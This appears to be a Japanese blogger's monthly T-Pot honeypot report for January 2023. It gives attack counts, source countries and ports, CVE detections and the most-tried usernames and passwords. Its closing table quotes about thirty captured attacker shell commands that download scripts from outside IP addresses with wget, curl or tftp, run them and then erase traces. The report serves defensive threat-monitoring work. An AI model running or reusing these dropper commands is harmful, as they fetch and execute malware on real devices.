ハニーポット運用(月次報告:2023年1月)
1.アフラックとチューリッヒで発生した情報漏洩について
- 正月明けの間もない2023年1月9日に「アフラック生命保険株式会社」と「チューリッヒ保険会社」から大規模な情報漏洩が発生したと発表された。
- 漏洩した規模はアフラックのがん保険契約者130万人以上とチューリッヒ保険の自動車保険契約者約76万人の個人情報がダークウェブ上に流出したとされる。
- アフラック社ではがん保険に関連する情報が、チューリッヒ社では自動車保険に関連する情報が含まれていた。
- 両社の漏洩情報には姓のみが登録されていた。しかし日本のメールアドレス作成時の特徴(姓+名をメールアドレスに含めることが多い、必要に応じてスパム対策用にランダム文字列も含める)と組み合わせた場合に、DB上は姓のみの登録であってもメールアドレスから名前を特定できてしまうのは、脆弱性の一部であると個人的に感じる。
2.CISSPの勉強開始
- CISSPの受験費用が2023年4月以降に値上がりするようだ。円安傾向もあるので、日本からの受験はさらに厳しくなりそうである。
- CISSPのオンライン教育を受講してみた。CISSPは昔からセキュリティ業界ではよく取り上げられる資格である。最近は費用対効果を踏まえて独学で資格取得することも多くなっているが、教育を受講できる立場にいるのであれば体系的な教育を受けることもよいだろう。幸運にも会社教育で試験講座の申し込みができた(業務調整ができたわけではないが...)ので、迷わずに教育受講の上で試験に挑むのである。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
更新無し。
前提条件
運用日時:2023年1月1日-2023年1月31日
運用期間:31日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
| No | ハニーポット | 件数 | 先月比 |
|---|---|---|---|
| 1 | Ddospot | 871,592 | 1(→) |
| 2 | Honeytrap | 471,218 | 4(↑) |
| 3 | Cowrie | 360,181 | 2(↓) |
| 4 | Dionaea | 246,511 | 5(↑) |
| 5 | Heralding | 238,503 | 3(↓) |
| 6 | Ciscoasa | 40,050 | 7(↑) |
| 7 | Mailoney | 28,207 | 6(→) |
| 8 | Redishoneypot | 28,033 | 11(↑) |
| 9 | Adbhoney | 20,612 | 8(↑) |
| 10 | Tanner | 6,496 | 9(↑) |
| 11 | CitrixHoneypot | 3,779 | 12(↑) |
| 12 | ConPot | 2,579 | 10(↓) |
| 13 | ElasticPot | 1,004 | 13(→) |
| 14 | Ipphoney | 217 | 14(→) |
| 15 | Dicompot | 104 | 15(→) |
- Result
- 先月と同様にDdospotへのアクセスが最多。
- Honeytrapへのアクセスが先月より増加傾向にあった。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
| No | 攻撃元の国名 | 件数 | 先月順位 |
|---|---|---|---|
| 1 | Brazil | 707,668 | 1(→) |
| 2 | United States | 232,457 | 3(↑) |
| 3 | China | 191,935 | 5(↑) |
| 4 | Switzerland | 146,768 | 圏外(↑) |
| 5 | Russia | 144,731 | 2(↓) |
| 6 | Netherlands | 91,473 | 4(↓) |
| 7 | United Kingdom | 63,160 | 10(↑) |
| 8 | India | 43,850 | 6(↓) |
| 9 | South Korea | 34,248 | 14(↑) |
| 10 | Sweden | 33,026 | 16(↑) |
| 11 | Thailand | 31,738 | 圏外(↑) |
| 12 | Latvia | 28,489 | 19(↑) |
| 13 | Iran | 25,627 | 圏外(↑) |
| 14 | Hong Kong | 24,491 | 20(↑) |
| 15 | Germany | 24,015 | 8(↓) |
| 16 | Japan | 23,633 | 7(↓) |
| 17 | Vietnam | 22,817 | 11(↓) |
| 18 | Indonesia | 15,408 | 17(↓) |
| 19 | Taiwan | 14,868 | 圏外(↑) |
| 20 | Mexico | 14,681 | 12(↓) |
- Result
- 全体のアクセス数は先月より減少傾向にあった。
- アクセス数の比率はブラジル(1位)が先月に引き続き多く、米国(2位)・中国(3位)・スイス(4位)も上位にあった。
- ロシア(5位)は先月よりアクセス数の順位が各国と比較して、減少していた。
上位10ヵ国のアクセスポートの分布は以下の通り
| 攻撃元の国名 | 宛先ポート | 件数 |
|---|---|---|
| 1 | Brazil | 53|694,639 |
| 2 | Brazil | 445|8,181 |
| 3 | Brazil | 123|887 |
| 4 | Brazil | 2323|318 |
| 5 | Brazil | 23|299 |
| 6 | Brazil | 19|244 |
| 7 | Brazil | 5555|185 |
| 8 | Brazil | 22|177 |
| 9 | Brazil | 4505|56 |
| 10 | Brazil | 2941|53 |
| 11 | United States | 123|17,167 |
| 12 | United States | 5900|16,872 |
| 13 | United States | 53|16,196 |
| 14 | United States | 6379|7,175 |
| 15 | United States | 22|5,655 |
| 16 | United States | 445|5,334 |
| 17 | United States | 23|3,909 |
| 18 | United States | 5555|3,754 |
| 19 | United States | 25|3,583 |
| 20 | United States | 3389|1,930 |
| 21 | China | 22|17,679 |
| 22 | China | 445|10,363 |
| 23 | China | 23|7,483 |
| 24 | China | 6379|6,105 |
| 25 | China | 123|4,696 |
| 26 | China | 2121|3,701 |
| 27 | China | 21|3,666 |
| 28 | China | 3389|1,620 |
| 29 | China | 1433|1,602 |
| 30 | China | 2375|1,172 |
| 31 | Switzerland | 5900|145,713 |
| 32 | Switzerland | 123|49 |
| 33 | Switzerland | 81|30 |
| 34 | Switzerland | 23|22 |
| 35 | Switzerland | 80|18 |
| 36 | Switzerland | 4719|11 |
| 37 | Switzerland | 5555|10 |
| 38 | Switzerland | 9010|10 |
| 39 | Switzerland | 56575|7 |
| 40 | Switzerland | 445|5 |
| 41 | Russia | 5900|35,735 |
| 42 | Russia | 445|13,164 |
| 43 | Russia | 22|2,860 |
| 44 | Russia | 123|1,990 |
| 45 | Russia | 6379|1,325 |
| 46 | Russia | 3389|926 |
| 47 | Russia | 23|851 |
| 48 | Russia | 443|790 |
| 49 | Russia | 80|480 |
| 50 | Russia | 25|377 |
| 51 | Netherlands | 5900|31,146 |
| 52 | Netherlands | 123|874 |
| 53 | Netherlands | 445|567 |
| 54 | Netherlands | 19|344 |
| 55 | Netherlands | 81|280 |
| 56 | Netherlands | 23|228 |
| 57 | Netherlands | 3390|203 |
| 58 | Netherlands | 80|170 |
| 59 | Netherlands | 53|166 |
| 60 | Netherlands | 6379|74 |
| 61 | United Kingdom | 25|20,082 |
| 62 | United Kingdom | 5900|6,681 |
| 63 | United Kingdom | 6379|6,630 |
| 64 | United Kingdom | 53|2,124 |
| 65 | United Kingdom | 123|1,758 |
| 66 | United Kingdom | 2323|1,052 |
| 67 | United Kingdom | 8080|466 |
| 68 | United Kingdom | 445|355 |
| 69 | United Kingdom | 9000|303 |
| 70 | United Kingdom | 9001|266 |
| 71 | India | 445|22,307 |
| 72 | India | 22|2,280 |
| 73 | India | 23|599 |
| 74 | India | 123|404 |
| 75 | India | 3391|221 |
| 76 | India | 60023|170 |
| 77 | India | 2323|100 |
| 78 | India | 8080|89 |
| 79 | India | 80|65 |
| 80 | India | 2020|61 |
| 81 | South Korea | 53|12,242 |
| 82 | South Korea | 445|3,459 |
| 83 | South Korea | 123|2,463 |
| 84 | South Korea | 22|1,680 |
| 85 | South Korea | 23|1,064 |
| 86 | South Korea | 5555|740 |
| 87 | South Korea | 2323|639 |
| 88 | South Korea | 80|553 |
| 89 | South Korea | 2222|232 |
| 90 | South Korea | 56575|223 |
| 91 | Sweden | 22|5,630 |
| 92 | Sweden | 80|2,695 |
| 93 | Sweden | 3389|1,884 |
| 94 | Sweden | 5555|365 |
| 95 | Sweden | 123|275 |
| 96 | Sweden | 23|79 |
| 97 | Sweden | 2323|78 |
| 98 | Sweden | 445|54 |
| 99 | Sweden | 37777|44 |
| 100 | Sweden | 53|24 |
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
| No | CVE ID | Count |
|---|---|---|
| 1 | CVE-2020-11899 | 734,077 |
| 2 | CVE-2020-11910 | 33 |
| 3 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 18 |
| 4 | CVE-1999-0016 | 6 |
- Result
- 先月から変更なし
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
| No | ユーザ名 | 件数 |
|---|---|---|
| 1 | root | 22,766 |
| 2 | admin | 5,457 |
| 3 | 2,106 | |
| 4 | user | 1,558 |
| 5 | 22 | 1,206 |
| 6 | sa | 989 |
| 7 | test | 681 |
| 8 | pi | 612 |
| 9 | !root | 611 |
| 10 | 2Wire | 591 |
| 11 | ubuntu | 554 |
| 12 | support | 553 |
| 13 | www | 550 |
| 14 | oracle | 547 |
| 15 | postgres | 534 |
| 16 | Admin | 477 |
| 17 | ftp | 462 |
| 18 | guest | 436 |
| 19 | anonymous | 397 |
| 20 | web | 372 |
| 21 | administrator | 370 |
| 22 | db | 365 |
| 23 | wwwroot | 364 |
| 24 | 666666 | 348 |
| 25 | data | 348 |
| 26 | steam | 330 |
| 27 | $ALOC$ | 304 |
| 28 | adm | 304 |
| 29 | cameras | 303 |
| 30 | ubnt | 298 |
| 31 | 0 | 296 |
| 32 | unknown | 296 |
| 33 | debug | 295 |
| 34 | blank | 292 |
| 35 | ftpuser | 272 |
| 36 | user123 | 260 |
| 37 | www-data | 242 |
| 38 | mysql | 234 |
| 39 | centos | 232 |
| 40 | hadoop | 218 |
| 41 | default | 202 |
| 42 | git | 161 |
| 43 | ec2-user | 160 |
| 44 | esuser | 153 |
| 45 | zyfwp | 153 |
| 46 | vagrant | 152 |
| 47 | factory | 139 |
| 48 | vadmin | 136 |
| 49 | es | 135 |
| 50 | telnet | 135 |
- Result
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
| No | パスワード | 件数 |
|---|---|---|
| 1 | admin | 3,618 |
| 2 | 3,429 | |
| 3 | 123456 | 2,858 |
| 4 | 1234 | 1,286 |
| 5 | root | 1,106 |
| 6 | blank | 886 |
| 7 | password | 842 |
| 8 | 12345 | 814 |
| 9 | 0 | 805 |
| 10 | user | 692 |
| 11 | ubnt | 504 |
| 12 | 666666 | 493 |
| 13 | support | 486 |
| 14 | 123 | 467 |
| 15 | 1 | 407 |
| 16 | 00000000 | 389 |
| 17 | alpine | 366 |
| 18 | hi3518 | 353 |
| 19 | Aa123456. | 352 |
| 20 | backup | 310 |
| 21 | cameras | 303 |
| 22 | 12345678 | 301 |
| 23 | master | 301 |
| 24 | !ishtar | 300 |
| 25 | synnet | 294 |
| 26 | _Cisco | 291 |
| 27 | 10023 | 290 |
| 28 | unknown | 290 |
| 29 | !qazzaq! | 258 |
| 30 | admin123 | 244 |
| 31 | test | 221 |
| 32 | 7ujMko0admin | 215 |
| 33 | 1234567890 | 203 |
| 34 | raspberry | 192 |
| 35 | 0000 | 189 |
| 36 | pass | 179 |
| 37 | guest | 171 |
| 38 | 1234567 | 165 |
| 39 | pi | 155 |
| 40 | 1qaz2wsx | 153 |
| 41 | 123123 | 148 |
| 42 | abc123 | 144 |
| 43 | factory | 138 |
| 44 | admin1234 | 137 |
| 45 | Test1234 | 124 |
| 46 | 123456789 | 117 |
| 47 | system | 117 |
| 48 | ubuntu | 114 |
| 49 | oracle | 110 |
| 50 | p@ssw0rd | 109 |
- Result
⑥今月のmasscanとZmap
massscanの観測結果は以下の通り。
Zmapの観測結果は以下の通り。
Result
- 特記事項は無し。
最後に
- 今年こそはCISSPを取得する。
- 正月早朝から始発でデータセンターから帰宅すると海風が身に染みる。来年は自宅で元旦を迎えたい。
* shファイルとexeファイル関連の問い合わせは以下の通り。
◆shファイルに関するアクセス
| No | ファイル名 | hash値(md5) | アクセス |
|---|---|---|---|
| 1 | - | - | "echo -e '\x41\x4b\x34\x37'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://209.141.51.132/telnetsc.sh; busybox wget htt[p]://209.141.51.132/telnetsc.sh; tftp -r telnetsc.sh -g 209.141.51.132; busybox tftp -r telnetsc.sh -g 209.141.51.132; ftpget -v -u anonymous -p anonymous -P 21 209.141.51.132 telnetsc.sh telnetsc.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 209.141.51.132 telnetsc.sh telnetsc.sh; chmod 777 telnetsc.sh; busybox chmod 777 telnetsc.sh; sh telnetsc.sh; rm -rf telnetsc.sh", |
| 2 | - | - | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget htt[p]://23.235.171.196:1211/112; curl -O htt[p]://23.235.171.196:1211/112; chmod +x 112; ./112; rm -rf 123.sh; history -c; |
| 3 | - | - | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget htt[p]://23.235.171.196:88/112; curl -O htt[p]://23.235.171.196:88/112; chmod +x 112; ./112; rm -rf 123.sh; history -c; |
| 4 | - | - | cat /etc/issue ; cd /tmp; wget htt[p]://107.182.129.239/Fourloko.sh; chmod +x Fourloko.sh; sh Fourloko.sh; rm -rf *, |
| 5 | - | - | cat /etc/issue ; cd /tmp; wget htt[p]://193.42.33.214/Fourloko.sh; chmod +x Fourloko.sh; sh Fourloko.sh; rm -rf *, |
| 6 | - | - | cat /etc/issue ; cd /tmp; wget htt[p]://195.58.39.18/Fourloko.sh; chmod +x Fourloko.sh; sh Fourloko.sh; rm -rf *, |
| 7 | - | - | cat /etc/issue ; cd /tmp; wget htt[p]://195.58.39.207/Fourloko.sh; chmod +x Fourloko.sh; sh Fourloko.sh; rm -rf *, |
| 8 | - | - | cd /data/local/tmp/; busybox wget htt[p]://107.189.5.56/w.sh; sh w.sh; curl htt[p]://107.189.5.56/c.sh; sh c.sh, |
| 9 | - | - | cd /data/local/tmp/; busybox wget htt[p]://107.189.6.164/w.sh; sh w.sh; curl htt[p]://107.189.6.164/c.sh; sh c.sh |
| 10 | - | - | cd /data/local/tmp/; busybox wget htt[p]://185.216.71.65/w.sh; sh w.sh; curl htt[p]://185.216.71.65/c.sh; sh c.sh |
| 11 | - | - | cd /data/local/tmp/; busybox wget htt[p]://193.35.18.198/w.sh; sh w.sh; curl htt[p]://193.35.18.198/c.sh; sh c.sh |
| 12 | - | - | cd /data/local/tmp/; busybox wget htt[p]://195.133.40.152/9x83HE5AFD/w.sh; sh w.sh; curl htt[p]://195.133.40.152/9x83HE5AFD/c.sh; sh c.sh, |
| 13 | - | - | cd /data/local/tmp/; busybox wget htt[p]://45.66.230.47/as.sh; sh as.sh; curl htt[p]://45.66.230.47/az.sh; sh az.sh; wget htt[p]://45.66.230.47/vget.sh; sh vget.sh; curl htt[p]://45.66.230.47/vget.sh; sh vget.sh; busybox wget htt[p]://45.66.230.47/vget.sh; sh vget.sh; busybox curl htt[p]://45.66.230.47/vget.sh; sh vget.sh, |
| 14 | - | - | cd /data/local/tmp/; busybox wget htt[p]://5.206.227.114/w.sh; sh w.sh; curl htt[p]://5.206.227.114/c.sh; sh c.sh, |
| 15 | - | - | cd /data/local/tmp/; busybox wget htt[p]://74.201.28.102/w.sh; sh w.sh; curl htt[p]://74.201.28.102/c.sh; sh c.sh; wget htt[p]://74.201.28.102/wget.sh; sh wget.sh; curl htt[p]://74.201.28.102/wget.sh; sh wget.sh; busybox wget htt[p]://74.201.28.102/wget.sh; sh wget.sh; busybox curl htt[p]://74.201.28.102/wget.sh; sh wget.sh, |
| 16 | - | - | cd /data/local/tmp/; busybox wget htt[p]://77.91.78.211/w.sh; sh w.sh; curl htt[p]://77.91.78.211/c.sh; sh c.sh |
| 17 | - | - | cd /data/local/tmp/; busybox wget htt[p]://78.153.130.141/w.sh; sh w.sh; curl htt[p]://78.153.130.141/c.sh; sh c.sh, |
| 18 | - | - | cd /data/local/tmp/; busybox wget htt[p]://79.137.196.249/w.sh; sh w.sh; curl htt[p]://79.137.196.249/c.sh; sh c.sh, |
| 19 | - | - | cd /data/local/tmp/; busybox wget htt[p]://85.209.134.231/w.sh; sh w.sh; curl htt[p]://85.209.134.231/c.sh; sh c.sh; wget htt[p]://85.209.134.231/wget.sh; sh wget.sh; curl htt[p]://85.209.134.231/wget.sh; sh wget.sh; busybox wget htt[p]://85.209.134.231/wget.sh; sh wget.sh; busybox curl htt[p]://85.209.134.231/wget.sh; sh wget.sh, |
| 20 | - | - | cd /data/local/tmp/; rm -rf w.sh c.sh; busybox wget htt[p]://107.189.5.161/w.sh; sh w.sh; curl htt[p]://107.189.5.161/c.sh; sh c.sh |
| 21 | - | - | cd /data/local/tmp/; rm -rf w.sh c.sh; busybox wget htt[p]://111.90.143.133/pedalcheta/w.sh; sh w.sh; curl htt[p]://111.90.143.133/pedalcheta/c.sh; sh c.sh, |
| 22 | - | - | cd /data/local/tmp/; rm -rf w.sh c.sh; busybox wget htt[p]://111.90.143.133/w.sh; sh w.sh; curl htt[p]://111.90.143.133/c.sh; sh c.sh, |
| 23 | - | - | cd /data/local/tmp/; rm -rf w.sh c.sh; busybox wget htt[p]://195.133.40.156/pedalcheta/w.sh; sh w.sh; curl htt[p]://195.133.40.156/pedalcheta/c.sh; sh c.sh, |
| 24 | - | - | cd /data/local/tmp/; rm -rf w.sh c.sh; busybox wget htt[p]://195.133.40.29/pedalcheta/w.sh; sh w.sh; curl htt[p]://195.133.40.29/pedalcheta/c.sh; sh c.sh |
| 25 | - | - | cd /data/local/tmp/; rm -rf w.sh c.sh; busybox wget htt[p]://98.126.16.166/w.sh; sh w.sh; curl htt[p]://98.126.16.166/c.sh; sh c.sh |
| 26 | - | - | cd /data/local/tmp;wget htt[p]://5.255.105.71/ohsitsvegawellrip.sh; curl -O htt[p]://5.255.105.71/ohsitsvegawellrip.sh; chmod 777 ohsitsvegawellrip.sh; ./ohsitsvegawellrip.sh, |
| 27 | - | - | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://5.255.105.240/jack5tr.sh; curl -O htt[p]://5.255.105.240/jack5tr.sh; chmod 777 jack5tr.sh; sh jack5tr.sh; tftp 5.255.105.240 -c get jack5tr.sh; chmod 777 jack5tr.sh; sh jack5tr.sh; tftp -r jack5tr2.sh -g 5.255.105.240; chmod 777 jack5tr2.sh; sh jack5tr2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.255.105.240 jack5tr1.sh jack5tr1.sh; sh jack5tr1.sh; rm -rf jack5tr.sh jack5tr.sh jack5tr2.sh jack5tr1.sh; rm -rf *, |
| 28 | - | - | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://5.255.105.240/ohsitsvegawellrip.sh; curl -O htt[p]://5.255.105.240/ohsitsvegawellrip.sh; chmod 777 ohsitsvegawellrip.sh; sh ohsitsvegawellrip.sh; tftp 5.255.105.240 -c get ohsitsvegawellrip.sh; chmod 777 ohsitsvegawellrip.sh; sh ohsitsvegawellrip.sh; tftp -r ohsitsvegawellrip2.sh -g 5.255.105.240; chmod 777 ohsitsvegawellrip2.sh; sh ohsitsvegawellrip2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.255.105.240 ohsitsvegawellrip1.sh ohsitsvegawellrip1.sh; sh ohsitsvegawellrip1.sh; rm -rf ohsitsvegawellrip.sh ohsitsvegawellrip.sh ohsitsvegawellrip2.sh ohsitsvegawellrip1.sh; rm -rf *, |
| 29 | - | - | cd /tmp; wget lolxdbins.sh; htt[p]://45.128.234.198/lolxdbins.sh; chmod 777 lolxdbins.sh; ./lolxdbins.sh; |
| 30 | - | - | cd /usr && wget htt[p]://165.3.86.10/install_pre.sh && bash install_pre.sh, |
| 31 | - | - | su -c;cd /data/local/tmp/; busybox wget htt[p]://185.224.128.215/wget.sh -O wget.sh;wget htt[p]://185.224.128.215/wget.sh -O wget.sh; sh wget.sh; curl htt[p]://185.224.128.215/curl.sh > curl.sh; sh c.sh |
今月の作業BGM
| 曲名 | アーティスト | 備考 |
|---|---|---|
| Wake Me Up | Avicii. | --- |
